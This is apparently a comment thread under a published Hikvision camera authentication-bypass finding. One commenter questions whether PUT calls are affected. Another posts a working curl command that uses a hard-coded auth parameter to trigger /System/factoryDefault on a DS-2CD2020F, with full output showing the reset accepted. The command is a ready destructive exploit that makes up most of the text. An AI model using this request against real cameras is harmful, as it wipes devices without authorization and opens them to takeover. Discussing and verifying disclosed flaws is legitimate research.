Thanks for publishing this. I looked at your findings and tested them against an unpatched Hikvision system I had on hand. You mentioned that "all other HikCGI calls" are vulnerable to the auth bypass but did you actually test ones like the factoryReset one? From what I can see only the ones that are normally called by GET appear vulnerable and the rest (PUT ones like factoryReset) still come out as 401 Unauthorized. Perhaps I missed something? Nice find either way!
That indeed working on my IPC DS-2CD2020F
$ curl -X PUT -v
http://192.168.5.20/System/factoryDefault?auth=YWRtaW46MTEK
* Hostname was NOT found in DNS cache
* Trying 192.168.5.20...
* Connected to 192.168.5.20 (192.168.5.20) port 80 (#0)
> PUT /System/factoryDefault?auth=YWRtaW46MTEK HTTP/1.1
> User-Agent: curl/7.38.0
> Host: 192.168.5.20
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Sun, 17 Sep 2017 11:31:01 GMT
* Server App-webs/ is not blacklisted
< Server: App-webs/
< Connection: close
< Content-Length: 257
< Content-Type: application/xml
<
<?xml version="1.0" encoding="UTF-8"?>
<ResponseStatus version="1.0" xmlns="
Oops:The page you are visiting may have been deleted,renamed or inaccessible.">
<requestURL>/System/factoryDefault</requestURL>
<statusCode>7</statusCode>
<statusString>Reboot Required</statusString>
</ResponseStatus>
* Closing connection 0
$